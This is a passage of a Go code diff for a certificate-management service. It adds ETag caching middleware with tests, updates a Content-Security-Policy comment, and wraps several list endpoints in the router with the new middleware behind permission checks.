|
||||||
|
if rec.bodyTruncated {
|
||||||
|
rec.flush()
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// Compute the ETag over the buffered body.
|
||||||
|
bodyBytes := rec.body.Bytes()
|
||||||
|
sum := sha256.Sum256(bodyBytes)
|
||||||
|
etag := `"` + hex.EncodeToString(sum[:]) + `"` // RFC 7232 strong-validator format
|
||||||
|
|
||||||
|
// If-None-Match handling. The header can be a
|
||||||
|
// comma-separated list; check each candidate against the
|
||||||
|
// computed ETag.
|
||||||
|
if matchETag(r.Header.Get("If-None-Match"), etag) {
|
||||||
|
// 304 Not Modified — preserve the ETag header but
|
||||||
|
// emit no body. Drop Content-Length to avoid the
|
||||||
|
// "declared length doesn't match body" mismatch some
|
||||||
|
// proxies are strict about.
|
||||||
|
h := w.Header()
|
||||||
|
h.Set("ETag", etag)
|
||||||
|
h.Del("Content-Length")
|
||||||
|
h.Del("Content-Type")
|
||||||
|
w.WriteHeader(http.StatusNotModified)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// Cache miss / first request. Emit the full response with
|
||||||
|
// ETag header for the next request to use.
|
||||||
|
w.Header().Set("ETag", etag)
|
||||||
|
rec.flush()
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// matchETag reports whether ifNoneMatch (the value of an If-None-Match
// header) selects etag (the validator computed for the current
// response). RFC 7232 §3.2 defines the header as:
//
//	If-None-Match = "*" / 1#entity-tag
//
// Rules applied:
//
//   - An empty header never matches.
//   - A header consisting solely of the wildcard `*` always matches.
//   - Otherwise the header is split on commas and each entry is
//     compared with the WEAK comparison function, as RFC 7232 §3.2
//     requires for If-None-Match: a leading `W/` is ignored on both
//     sides and the quoted opaque tags are compared byte-for-byte.
//     This middleware only ever emits strong tags, but a client or an
//     intermediary may send the same tag back in its weak form
//     (`W/"..."`), and that must still count as a match.
//
// Entries are separated with a plain comma split; that is sufficient
// for the hex-digest tags this package produces, which never contain a
// comma.
func matchETag(ifNoneMatch, etag string) bool {
	if ifNoneMatch == "" {
		return false
	}
	// Cheap wildcard fast-path.
	if strings.TrimSpace(ifNoneMatch) == "*" {
		return true
	}

	want := strings.TrimPrefix(etag, "W/")
	for _, candidate := range strings.Split(ifNoneMatch, ",") {
		opaque := strings.TrimPrefix(strings.TrimSpace(candidate), "W/")
		if opaque == want {
			return true
		}
	}
	return false
}
|
||||||
|
|
||||||
|
// etagRecorder is the http.ResponseWriter the ETag middleware hands to
// the wrapped handler. It captures the status code and body bytes
// instead of sending them, so the middleware can hash the body once
// the handler returns; nothing reaches the embedded writer until
// flush() runs or the body outgrows the buffer cap.
type etagRecorder struct {
	http.ResponseWriter

	// Captured response state.
	status int           // status to send; overwritten by the handler's first WriteHeader
	body   *bytes.Buffer // body bytes held back for hashing

	// Progress flags.
	headerWritten       bool // the handler called WriteHeader (or an implicit 200 was assumed)
	headerWrittenOnWire bool // the status line has been sent to the embedded writer
	bodyTruncated       bool // the body exceeded the cap and was streamed instead of buffered
}
|
||||||
|
|
||||||
|
func (r *etagRecorder) WriteHeader(status int) {
|
||||||
|
if r.headerWritten {
|
||||||
|
// Honor the http stdlib's contract: subsequent
|
||||||
|
// WriteHeader calls are ignored after the first.
|
||||||
|
return
|
||||||
|
}
|
||||||
|
r.status = status
|
||||||
|
r.headerWritten = true
|
||||||
|
}
|
||||||
|
|
||||||
|
func (r *etagRecorder) Write(b []byte) (int, error) {
|
||||||
|
if r.bodyTruncated {
|
||||||
|
// The buffer's full; subsequent writes are reported as
|
||||||
|
// successful but never make it into the buffer. flush()
|
||||||
|
// writes the buffer + any further bytes directly when it
|
||||||
|
// runs (see flush implementation below). Returning the
|
||||||
|
// caller-requested length here preserves io.Writer
|
||||||
|
// semantics for the handler.
|
||||||
|
return len(b), nil
|
||||||
|
}
|
||||||
|
// Track whether THIS write would push us over the cap. If
|
||||||
|
// yes, stop buffering — the body is too big to ETag.
|
||||||
|
if r.body.Len()+len(b) > maxETagBufferBytes {
|
||||||
|
r.bodyTruncated = true
|
||||||
|
// Flush the buffered prefix + this chunk straight to the
|
||||||
|
// wire; preserve the handler's bytes-written count.
|
||||||
|
// Headers haven't been written yet (we hold them until
|
||||||
|
// flush); write them now.
|
||||||
|
r.writeHeadersToWire()
|
||||||
|
if r.body.Len() > 0 {
|
||||||
|
if _, err := r.ResponseWriter.Write(r.body.Bytes()); err != nil {
|
||||||
|
return 0, err
|
||||||
|
}
|
||||||
|
r.body.Reset()
|
||||||
|
}
|
||||||
|
return r.ResponseWriter.Write(b)
|
||||||
|
}
|
||||||
|
return r.body.Write(b)
|
||||||
|
}
|
||||||
|
|
||||||
|
// writeHeadersToWire emits the buffered status to the underlying
|
||||||
|
// ResponseWriter. Idempotent — subsequent calls are no-ops.
|
||||||
|
func (r *etagRecorder) writeHeadersToWire() {
|
||||||
|
if !r.headerWritten {
|
||||||
|
// Handler never called WriteHeader explicitly; the
|
||||||
|
// http.ResponseWriter contract says that's an implicit
|
||||||
|
// 200 OK on the first Write.
|
||||||
|
r.status = http.StatusOK
|
||||||
|
r.headerWritten = true
|
||||||
|
}
|
||||||
|
// Detect "already flushed" via a sentinel: if the underlying
|
||||||
|
// ResponseWriter has already received the status (via our
|
||||||
|
// own bodyTruncated path), the second call is a no-op.
|
||||||
|
// Standard library's WriteHeader documents that calling it
|
||||||
|
// twice is a logger warning; we want to avoid that.
|
||||||
|
// To avoid double-write, we use an internal flag.
|
||||||
|
if r.bodyTruncated && r.headerWrittenOnWire {
|
||||||
|
return
|
||||||
|
}
|
||||||
|
// Hotfix #12 (CodeQL alert #34 — go/reflected-xss): defense-in-
|
||||||
|
// depth Content-Type guard. This middleware is wired ONLY to JSON
|
||||||
|
// list endpoints (GET /api/v1/{certificates,agents,jobs,audit,
|
||||||
|
// discovered-certificates} — see internal/api/router/router.go).
|
||||||
|
// Every wrapped handler currently sets Content-Type:
|
||||||
|
// application/json via handler.JSON() before the first Write. But
|
||||||
|
// the recorder is a generic byte forwarder; CodeQL's data-flow
|
||||||
|
// query sees `r.ResponseWriter.Write(b)` at the sink and can't
|
||||||
|
// see that the wrapped handler set a non-HTML Content-Type — so
|
||||||
|
// it flags reflected-XSS even though browsers don't render
|
||||||
|
// application/json as HTML. The fix is to make the Content-Type
|
||||||
|
// guarantee explicit at the chokepoint: if the wrapped handler
|
||||||
|
// forgot to set Content-Type, default to application/json +
|
||||||
|
// charset=utf-8 here. Behavior-preserving for the 5 current
|
||||||
|
// handlers (they all set Content-Type) and a safe guard against
|
||||||
|
// a future handler bug that would otherwise let the browser
|
||||||
|
// content-sniff a JSON body as text/html.
|
||||||
|
//
|
||||||
|
// Drop the embedded-field selector for Header() — etagRecorder
|
||||||
|
// doesn't override Header(), so r.Header() resolves to the
|
||||||
|
// embedded ResponseWriter.Header() (staticcheck QF1008). The
|
||||||
|
// neighboring r.ResponseWriter.WriteHeader / r.ResponseWriter.Write
|
||||||
|
// calls intentionally KEEP the explicit selector because
|
||||||
|
// etagRecorder.Write / etagRecorder.WriteHeader override them
|
||||||
|
// and the embedded form is required to bypass recursion.
|
||||||
|
hdr := r.Header()
|
||||||
|
if hdr.Get("Content-Type") == "" {
|
||||||
|
hdr.Set("Content-Type", "application/json; charset=utf-8")
|
||||||
|
}
|
||||||
|
r.ResponseWriter.WriteHeader(r.status)
|
||||||
|
r.headerWrittenOnWire = true
|
||||||
|
}
|
||||||
|
|
||||||
|
// flush emits the buffered status + body to the underlying
|
||||||
|
// ResponseWriter. Called by the ETag middleware after the handler
|
||||||
|
// returns AND the response is either a cache miss (no
|
||||||
|
// If-None-Match match) or non-cacheable (4xx, oversized).
|
||||||
|
func (r *etagRecorder) flush() {
|
||||||
|
if r.bodyTruncated {
|
||||||
|
// Headers + body already on the wire via Write's
|
||||||
|
// truncation path. Nothing to flush.
|
||||||
|
return
|
||||||
|
}
|
||||||
|
r.writeHeadersToWire()
|
||||||
|
if r.body.Len() > 0 {
|
||||||
|
_, _ = r.ResponseWriter.Write(r.body.Bytes())
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -0,0 +1,259 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package middleware
|
||||||
|
|
||||||
|
import (
|
||||||
|
"io"
|
||||||
|
"net/http"
|
||||||
|
"net/http/httptest"
|
||||||
|
"strings"
|
||||||
|
"testing"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 6 SCALE-L2 contract pin (2026-05-14): the ETag middleware
|
||||||
|
// must:
|
||||||
|
// 1. Emit an ETag header on successful GET / HEAD responses.
|
||||||
|
// 2. Return 304 Not Modified when the client's If-None-Match
|
||||||
|
// matches the computed ETag (cache hit).
|
||||||
|
// 3. Return 200 + new ETag when the body has changed (cache miss
|
||||||
|
// after mutation).
|
||||||
|
// 4. NOT apply to POST / PUT / DELETE.
|
||||||
|
// 5. NOT apply to non-2xx responses (errors pass through unchanged).
|
||||||
|
// 6. Skip ETag for over-sized responses (degrade gracefully, not
|
||||||
|
// crash).
|
||||||
|
|
||||||
|
func TestETag_GET_EmitsETagHeader(t *testing.T) {
|
||||||
|
handler := ETag(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
w.Header().Set("Content-Type", "application/json")
|
||||||
|
_, _ = w.Write([]byte(`{"items":[{"id":"cert-1"}],"total":1}`))
|
||||||
|
}))
|
||||||
|
|
||||||
|
req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||||
|
rec := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec, req)
|
||||||
|
|
||||||
|
if rec.Code != http.StatusOK {
|
||||||
|
t.Errorf("status = %d; want 200", rec.Code)
|
||||||
|
}
|
||||||
|
if etag := rec.Header().Get("ETag"); etag == "" {
|
||||||
|
t.Errorf("ETag header is empty; want non-empty strong validator")
|
||||||
|
}
|
||||||
|
if !strings.Contains(rec.Body.String(), "cert-1") {
|
||||||
|
t.Errorf("body missing handler output: %q", rec.Body.String())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestETag_RepeatedRequest_Returns304(t *testing.T) {
|
||||||
|
body := []byte(`{"items":[{"id":"cert-1"}],"total":1}`)
|
||||||
|
handler := ETag(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
w.Header().Set("Content-Type", "application/json")
|
||||||
|
_, _ = w.Write(body)
|
||||||
|
}))
|
||||||
|
|
||||||
|
// First request — establish the cache.
|
||||||
|
req1 := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||||
|
rec1 := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec1, req1)
|
||||||
|
|
||||||
|
etag := rec1.Header().Get("ETag")
|
||||||
|
if etag == "" {
|
||||||
|
t.Fatal("first response missing ETag — cannot run cache-hit test")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Second request with If-None-Match — should 304.
|
||||||
|
req2 := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||||
|
req2.Header.Set("If-None-Match", etag)
|
||||||
|
rec2 := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec2, req2)
|
||||||
|
|
||||||
|
if rec2.Code != http.StatusNotModified {
|
||||||
|
t.Errorf("status = %d; want 304 Not Modified (cache hit)", rec2.Code)
|
||||||
|
}
|
||||||
|
if rec2.Body.Len() != 0 {
|
||||||
|
t.Errorf("304 response body non-empty: %q (RFC 7232 §4.1: 304 MUST NOT have a body)", rec2.Body.String())
|
||||||
|
}
|
||||||
|
if rec2.Header().Get("ETag") != etag {
|
||||||
|
t.Errorf("304 response ETag = %q; want %q (must be preserved for next request)", rec2.Header().Get("ETag"), etag)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestETag_AfterMutation_Returns200WithNewETag(t *testing.T) {
|
||||||
|
// Simulate a mutation: the handler's response body changes
|
||||||
|
// between request 1 and request 3. Request 2 (with stale
|
||||||
|
// If-None-Match) must miss and return 200 + the new ETag.
|
||||||
|
currentBody := []byte(`{"items":[{"id":"cert-1"}],"total":1}`)
|
||||||
|
handler := ETag(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
w.Header().Set("Content-Type", "application/json")
|
||||||
|
_, _ = w.Write(currentBody)
|
||||||
|
}))
|
||||||
|
|
||||||
|
// Initial request — capture ETag.
|
||||||
|
req1 := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||||
|
rec1 := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec1, req1)
|
||||||
|
etag1 := rec1.Header().Get("ETag")
|
||||||
|
|
||||||
|
// Simulate a mutation by changing the response body.
|
||||||
|
currentBody = []byte(`{"items":[{"id":"cert-1"},{"id":"cert-2"}],"total":2}`)
|
||||||
|
|
||||||
|
// Repeat request with stale ETag — should miss (200, new ETag).
|
||||||
|
req2 := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||||
|
req2.Header.Set("If-None-Match", etag1)
|
||||||
|
rec2 := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec2, req2)
|
||||||
|
|
||||||
|
if rec2.Code != http.StatusOK {
|
||||||
|
t.Errorf("status = %d; want 200 (cache miss after mutation)", rec2.Code)
|
||||||
|
}
|
||||||
|
etag2 := rec2.Header().Get("ETag")
|
||||||
|
if etag2 == etag1 {
|
||||||
|
t.Errorf("ETag unchanged after body mutation: %q = %q", etag1, etag2)
|
||||||
|
}
|
||||||
|
if !strings.Contains(rec2.Body.String(), "cert-2") {
|
||||||
|
t.Errorf("post-mutation body missing new content: %q", rec2.Body.String())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestETag_POST_BypassesMiddleware(t *testing.T) {
|
||||||
|
handler := ETag(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
w.WriteHeader(http.StatusCreated)
|
||||||
|
_, _ = w.Write([]byte(`{"id":"cert-new"}`))
|
||||||
|
}))
|
||||||
|
|
||||||
|
req := httptest.NewRequest(http.MethodPost, "/api/v1/certificates", strings.NewReader(`{}`))
|
||||||
|
rec := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec, req)
|
||||||
|
|
||||||
|
if rec.Code != http.StatusCreated {
|
||||||
|
t.Errorf("status = %d; want 201", rec.Code)
|
||||||
|
}
|
||||||
|
if etag := rec.Header().Get("ETag"); etag != "" {
|
||||||
|
t.Errorf("ETag header set on POST response: %q (POST/PUT/DELETE must not have ETag)", etag)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestETag_5xx_PassesThroughWithoutETag(t *testing.T) {
|
||||||
|
handler := ETag(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
w.WriteHeader(http.StatusInternalServerError)
|
||||||
|
_, _ = w.Write([]byte(`{"error":"boom"}`))
|
||||||
|
}))
|
||||||
|
|
||||||
|
req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||||
|
rec := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec, req)
|
||||||
|
|
||||||
|
if rec.Code != http.StatusInternalServerError {
|
||||||
|
t.Errorf("status = %d; want 500", rec.Code)
|
||||||
|
}
|
||||||
|
if etag := rec.Header().Get("ETag"); etag != "" {
|
||||||
|
t.Errorf("ETag set on 500 response: %q (non-2xx must not be cached)", etag)
|
||||||
|
}
|
||||||
|
if !strings.Contains(rec.Body.String(), "boom") {
|
||||||
|
t.Errorf("error body lost: %q", rec.Body.String())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestETag_4xx_PassesThroughWithoutETag(t *testing.T) {
|
||||||
|
handler := ETag(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
w.WriteHeader(http.StatusBadRequest)
|
||||||
|
_, _ = w.Write([]byte(`{"error":"invalid query"}`))
|
||||||
|
}))
|
||||||
|
|
||||||
|
req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates?bad=true", nil)
|
||||||
|
rec := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec, req)
|
||||||
|
|
||||||
|
if rec.Code != http.StatusBadRequest {
|
||||||
|
t.Errorf("status = %d; want 400", rec.Code)
|
||||||
|
}
|
||||||
|
if etag := rec.Header().Get("ETag"); etag != "" {
|
||||||
|
t.Errorf("ETag set on 400 response: %q (non-2xx must not be cached)", etag)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestETag_OversizedResponse_DegradesGracefully(t *testing.T) {
|
||||||
|
// Response larger than maxETagBufferBytes (64 KiB) must not
|
||||||
|
// be ETag'd, but the response itself must reach the client
|
||||||
|
// intact.
|
||||||
|
bigBody := make([]byte, maxETagBufferBytes+1024)
|
||||||
|
for i := range bigBody {
|
||||||
|
bigBody[i] = 'x'
|
||||||
|
}
|
||||||
|
handler := ETag(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
w.Header().Set("Content-Type", "text/plain")
|
||||||
|
_, _ = w.Write(bigBody)
|
||||||
|
}))
|
||||||
|
|
||||||
|
req := httptest.NewRequest(http.MethodGet, "/api/v1/audit?limit=10000", nil)
|
||||||
|
rec := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec, req)
|
||||||
|
|
||||||
|
if rec.Code != http.StatusOK {
|
||||||
|
t.Errorf("status = %d; want 200 (oversize body should not 5xx)", rec.Code)
|
||||||
|
}
|
||||||
|
if etag := rec.Header().Get("ETag"); etag != "" {
|
||||||
|
t.Errorf("ETag emitted for oversize response: %q (should degrade silently)", etag)
|
||||||
|
}
|
||||||
|
if got, want := rec.Body.Len(), len(bigBody); got != want {
|
||||||
|
t.Errorf("body bytes received = %d; want %d (oversize body should not be truncated on the wire)", got, want)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestETag_Wildcard_MatchesAny(t *testing.T) {
|
||||||
|
// RFC 7232 §3.2: If-None-Match: * matches any current
|
||||||
|
// representation. Clients use this for "give me 304 if anything
|
||||||
|
// exists" semantics.
|
||||||
|
handler := ETag(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
_, _ = w.Write([]byte(`{"any":"thing"}`))
|
||||||
|
}))
|
||||||
|
|
||||||
|
req := httptest.NewRequest(http.MethodGet, "/api/v1/certificates", nil)
|
||||||
|
req.Header.Set("If-None-Match", "*")
|
||||||
|
rec := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec, req)
|
||||||
|
|
||||||
|
if rec.Code != http.StatusNotModified {
|
||||||
|
t.Errorf("status = %d; want 304 (If-None-Match: * always matches)", rec.Code)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestETag_HEAD_TreatedLikeGET(t *testing.T) {
|
||||||
|
body := []byte(`{"items":[],"total":0}`)
|
||||||
|
handler := ETag(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
// A real HEAD handler wouldn't actually write a body but
|
||||||
|
// the middleware shouldn't care — the ETag derives from
|
||||||
|
// whatever the handler emits.
|
||||||
|
_, _ = w.Write(body)
|
||||||
|
}))
|
||||||
|
|
||||||
|
req := httptest.NewRequest(http.MethodHead, "/api/v1/certificates", nil)
|
||||||
|
rec := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec, req)
|
||||||
|
|
||||||
|
if rec.Code != http.StatusOK {
|
||||||
|
t.Errorf("status = %d; want 200", rec.Code)
|
||||||
|
}
|
||||||
|
if etag := rec.Header().Get("ETag"); etag == "" {
|
||||||
|
t.Errorf("HEAD response missing ETag (HEAD should be treated like GET)")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// TestETag_ChainCheck — paranoia check that the recorder doesn't
|
||||||
|
// drop bytes vs the underlying ResponseWriter. Reads back the
|
||||||
|
// body and asserts byte-equality with what the handler wrote.
|
||||||
|
func TestETag_PassThrough_PreservesBody(t *testing.T) {
|
||||||
|
body := []byte(`{"a":1,"b":2,"c":3}`)
|
||||||
|
handler := ETag(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||||
|
_, _ = w.Write(body)
|
||||||
|
}))
|
||||||
|
|
||||||
|
req := httptest.NewRequest(http.MethodGet, "/api/v1/jobs", nil)
|
||||||
|
rec := httptest.NewRecorder()
|
||||||
|
handler.ServeHTTP(rec, req)
|
||||||
|
|
||||||
|
got, _ := io.ReadAll(rec.Body)
|
||||||
|
if string(got) != string(body) {
|
||||||
|
t.Errorf("body bytes mismatched: got %q, want %q", string(got), string(body))
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -32,9 +32,35 @@ type SecurityHeadersConfig struct {
|
|||||||
// CSP: default-src 'self' confines fetches to the same origin.
|
// CSP: default-src 'self' confines fetches to the same origin.
|
||||||
// img-src 'self' data: allows inline base64 images (used by the
|
// img-src 'self' data: allows inline base64 images (used by the
|
||||||
// dashboard's certctl-logo and a few status icons).
|
// dashboard's certctl-logo and a few status icons).
|
||||||
// style-src 'self' 'unsafe-inline' is required because Tailwind
|
// style-src 'self' 'unsafe-inline' — the 'unsafe-inline' grant
|
||||||
// (via Vite) injects per-component <style> blocks at build time;
|
// is required by React's inline `style={...}` attribute model,
|
||||||
// without 'unsafe-inline' the dashboard would render unstyled.
|
// which emits HTML `style="..."` attributes that the browser
|
||||||
|
// treats as inline styles for CSP purposes. The dashboard has 5
|
||||||
|
// load-bearing dynamic-style sites: Tooltip's Floating-UI
|
||||||
|
// position (left/top px values computed per-tick),
|
||||||
|
// AgentFleetPage's dynamic color+width chart bars,
|
||||||
|
// dashboard/charts.tsx Recharts color props, CertificatesPage's
|
||||||
|
// progress-bar percent width, IssuerHierarchyPage's depth-based
|
||||||
|
// marginLeft. The static-pixel uses (UsersPage filter + table UI,
|
||||||
|
// DigestPage iframe min-height, AuthProvider demo-mode banner)
|
||||||
|
// were migrated to Tailwind utility classes via FE-M6 closure
|
||||||
|
// 2026-05-14.
|
||||||
|
//
|
||||||
|
// FE-M6 audit-framing correction: this comment USED TO say
|
||||||
|
// "Tailwind (via Vite) injects per-component <style> blocks at
|
||||||
|
// build time." That was factually wrong. Vite's CSS output is a
|
||||||
|
// single .css file linked via <link rel="stylesheet"> — verified
|
||||||
|
// against dist/index.html post-build: zero <style> tags emitted.
|
||||||
|
// The 'unsafe-inline' grant exists for React's style-attribute
|
||||||
|
// output path, not for Vite or Tailwind.
|
||||||
|
//
|
||||||
|
// Fully eliminating 'unsafe-inline' would require either banning
|
||||||
|
// dynamic `style={...}` (rewriting the 5 load-bearing sites with
|
||||||
|
// a CSS-in-JS library that emits hashed/nonce'd <style> blocks)
|
||||||
|
// or adopting CSP nonces with React 18+'s style runtime. Neither
|
||||||
|
// fits the original FE-M6 phase budget; tracked as a future
|
||||||
|
// security-hardening item.
|
||||||
|
//
|
||||||
// 'unsafe-inline' is intentionally NOT in script-src — the
|
// 'unsafe-inline' is intentionally NOT in script-src — the
|
||||||
// front-end ships as a bundled JS file, no inline scripts.
|
// front-end ships as a bundled JS file, no inline scripts.
|
||||||
//
|
//
|
||||||
|
|||||||
@@ -11,6 +11,43 @@ import (
|
|||||||
"github.com/certctl-io/certctl/internal/auth"
|
"github.com/certctl-io/certctl/internal/auth"
|
||||||
)
|
)
|
||||||
|
|
||||||
|
// etaggedFunc wraps a list-endpoint handler with the SCALE-L2 ETag
|
||||||
|
// middleware. Phase 6 SCALE-L2 closure (2026-05-14): the top-5
|
||||||
|
// read-heavy list endpoints (/certificates, /jobs, /agents,
|
||||||
|
// /audit, /discovered-certificates) get ETag + If-None-Match
|
||||||
|
// short-circuit to avoid re-running their SELECT COUNT(*) +
|
||||||
|
// row-marshaling pass on every dashboard poll.
|
||||||
|
//
|
||||||
|
// Call-site shape (rbacGate is OUTER, etaggedFunc is INNER):
|
||||||
|
//
|
||||||
|
// r.Register(route, rbacGate(checker, "perm", etaggedFunc(handler)))
|
||||||
|
//
|
||||||
|
// Wrap order at request time:
|
||||||
|
//
|
||||||
|
// request → rbacGate → etaggedFunc → handler
|
||||||
|
//
|
||||||
|
// Auth runs FIRST. Unauthenticated requests bounce at HTTP 403
|
||||||
|
// before the response-buffering ETag middleware ever runs, so the
|
||||||
|
// SHA-256-over-body cost only applies to authenticated 2xx
|
||||||
|
// responses. This shape is also what TestRouterRBACGateCoverage
|
||||||
|
// asserts (the AST CI guard introduced for 2026-05-10 audit CRIT-1
|
||||||
|
// requires rbacGate / rbacGateScoped to be the OUTER wrap on every
|
||||||
|
// state-changing or read endpoint).
|
||||||
|
//
|
||||||
|
// Phase 6's initial commit shipped the OPPOSITE order
|
||||||
|
// (etagged(rbacGate(handler))) — functionally safe because the ETag
|
||||||
|
// middleware emits ETag only on 2xx responses, but it failed the
|
||||||
|
// AST coverage test. Phase 8 hotfix (commit see git log --grep=U1000
|
||||||
|
// follow-on) inverted the wrap so rbacGate is the outer call.
|
||||||
|
//
|
||||||
|
// The signature is http.HandlerFunc → http.HandlerFunc (not the
|
||||||
|
// http.Handler form) because rbacGate expects http.HandlerFunc as
|
||||||
|
// its third arg; nesting an http.Handler-returning helper inside it
|
||||||
|
// would type-fail.
|
||||||
|
func etaggedFunc(h http.HandlerFunc) http.HandlerFunc {
|
||||||
|
return middleware.ETag(h).ServeHTTP
|
||||||
|
}
|
||||||
|
|
||||||
// rbacGate wraps a handler with auth.RequirePermission(checker, perm,
|
// rbacGate wraps a handler with auth.RequirePermission(checker, perm,
|
||||||
// nil) — i.e. a GLOBAL-SCOPE permission check. Used by RegisterHandlers
|
// nil) — i.e. a GLOBAL-SCOPE permission check. Used by RegisterHandlers
|
||||||
// to gate every state-changing + read endpoint. When checker is nil the
|
// to gate every state-changing + read endpoint. When checker is nil the
|
||||||
@@ -567,7 +604,7 @@ func (r *Router) RegisterHandlers(reg HandlerRegistry) {
|
|||||||
r.Register("POST /api/v1/est/certificates/bulk-revoke", rbacGate(reg.Checker, "cert.bulk_revoke", reg.BulkRevocation.BulkRevokeEST))
|
r.Register("POST /api/v1/est/certificates/bulk-revoke", rbacGate(reg.Checker, "cert.bulk_revoke", reg.BulkRevocation.BulkRevokeEST))
|
||||||
r.Register("POST /api/v1/certificates/bulk-renew", rbacGate(reg.Checker, "cert.issue", reg.BulkRenewal.BulkRenew))
|
r.Register("POST /api/v1/certificates/bulk-renew", rbacGate(reg.Checker, "cert.issue", reg.BulkRenewal.BulkRenew))
|
||||||
r.Register("POST /api/v1/certificates/bulk-reassign", rbacGate(reg.Checker, "cert.edit", reg.BulkReassignment.BulkReassign))
|
r.Register("POST /api/v1/certificates/bulk-reassign", rbacGate(reg.Checker, "cert.edit", reg.BulkReassignment.BulkReassign))
|
||||||
r.Register("GET /api/v1/certificates", rbacGate(reg.Checker, "cert.read", reg.Certificates.ListCertificates))
|
r.Register("GET /api/v1/certificates", rbacGate(reg.Checker, "cert.read", etaggedFunc(reg.Certificates.ListCertificates)))
|
||||||
r.Register("POST /api/v1/certificates", rbacGate(reg.Checker, "cert.issue", reg.Certificates.CreateCertificate))
|
r.Register("POST /api/v1/certificates", rbacGate(reg.Checker, "cert.issue", reg.Certificates.CreateCertificate))
|
||||||
r.Register("GET /api/v1/certificates/{id}", rbacGate(reg.Checker, "cert.read", reg.Certificates.GetCertificate))
|
r.Register("GET /api/v1/certificates/{id}", rbacGate(reg.Checker, "cert.read", reg.Certificates.GetCertificate))
|
||||||
r.Register("PUT /api/v1/certificates/{id}", rbacGate(reg.Checker, "cert.edit", reg.Certificates.UpdateCertificate))
|
r.Register("PUT /api/v1/certificates/{id}", rbacGate(reg.Checker, "cert.edit", reg.Certificates.UpdateCertificate))
|
||||||
@@ -619,7 +656,7 @@ func (r *Router) RegisterHandlers(reg HandlerRegistry) {
|
|||||||
// * DELETE /api/v1/agents/{id} — RetireAgent. Replaces the pre-I-004
|
// * DELETE /api/v1/agents/{id} — RetireAgent. Replaces the pre-I-004
|
||||||
// hard-delete; the underlying repo does a soft-retire with
|
// hard-delete; the underlying repo does a soft-retire with
|
||||||
// optional cascade.
|
// optional cascade.
|
||||||
r.Register("GET /api/v1/agents", rbacGate(reg.Checker, "agent.read", reg.Agents.ListAgents))
|
r.Register("GET /api/v1/agents", rbacGate(reg.Checker, "agent.read", etaggedFunc(reg.Agents.ListAgents)))
|
||||||
r.Register("POST /api/v1/agents", rbacGate(reg.Checker, "agent.edit", reg.Agents.RegisterAgent))
|
r.Register("POST /api/v1/agents", rbacGate(reg.Checker, "agent.edit", reg.Agents.RegisterAgent))
|
||||||
r.Register("GET /api/v1/agents/retired", rbacGate(reg.Checker, "agent.read", reg.Agents.ListRetiredAgents))
|
r.Register("GET /api/v1/agents/retired", rbacGate(reg.Checker, "agent.read", reg.Agents.ListRetiredAgents))
|
||||||
r.Register("GET /api/v1/agents/{id}", rbacGate(reg.Checker, "agent.read", reg.Agents.GetAgent))
|
r.Register("GET /api/v1/agents/{id}", rbacGate(reg.Checker, "agent.read", reg.Agents.GetAgent))
|
||||||
@@ -631,7 +668,7 @@ func (r *Router) RegisterHandlers(reg HandlerRegistry) {
|
|||||||
r.Register("POST /api/v1/agents/{id}/jobs/{job_id}/status", rbacGate(reg.Checker, "agent.job.complete", reg.Agents.AgentReportJobStatus))
|
r.Register("POST /api/v1/agents/{id}/jobs/{job_id}/status", rbacGate(reg.Checker, "agent.job.complete", reg.Agents.AgentReportJobStatus))
|
||||||
|
|
||||||
// Jobs routes: /api/v1/jobs
|
// Jobs routes: /api/v1/jobs
|
||||||
